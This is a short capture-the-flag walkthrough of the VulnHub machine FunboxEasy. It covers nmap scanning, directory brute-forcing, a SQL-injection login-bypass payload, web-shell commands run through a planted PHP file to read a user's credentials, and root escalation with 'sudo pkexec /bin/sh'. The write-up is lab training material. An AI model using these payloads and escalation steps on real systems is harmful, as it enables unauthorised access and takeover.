Boot2Root ! Easy going, but with this Funbox you have to spend a bit more time. Much more, if you stuck in good traps. But most of the traps have hints, that they are traps. Vulnhub link to download FunboxEasy:- FunboxEasy
We always start with an nmap scan…..
Nmap -sC -sV -oA nmap <Target-IP>
Nmap scan report for 192.168.250.111 Host is up (0.27s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_gym |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Nov 17 04:15:11 2020 -- 1 IP address (1 host up) scanned in 67.65 seconds
Ok let hit the robots.txt on port 80.
Gym let try to access it with the IP/gym
I spend a little time trying to get the right credentials but no luck so i decided to burst some directorys with dirbuster i think the robots.txt is the first rabbit hole lol.
Another dir let check it out.
Small CRM Projects admin login page let try to check for some default credentials or maybe a vulnerable to get in.
Description: There is a SQL injection vulnerability in the /index.php page which allows for an attacker to use the SQLi login bypass payload ‘=’‘or’ for both the username and password parameters, this allows for any authenticated or low level user to login to the admin account.
Boom we are in but it just another rabbit hole 2 lol let enumerate more let go back to our dirbuster to check more dir.
The store dir look interesting let hit it.
Online book store by projectworlds pretty old also 2017 cool.
Let download and try the exploit.
Boom finally we are in.
http://192.168.250.111/store/bootstrap/img/B8Wsi38YLp.php?cmd=ls -la /home
http://192.168.250.111/store/bootstrap/img/B8Wsi38YLp.php?cmd=ls -la /home/tony
Boom we have the ssh password also the username which is tony let hit ssh.
ssh we are in first thing first let check sudo with
Plenty way to get root but let go with
/usr/bin/pkexec let check GTFOBins
Now let run
sudo pkexec /bin/sh
We are root Box Rooted.
Greeting From Muzec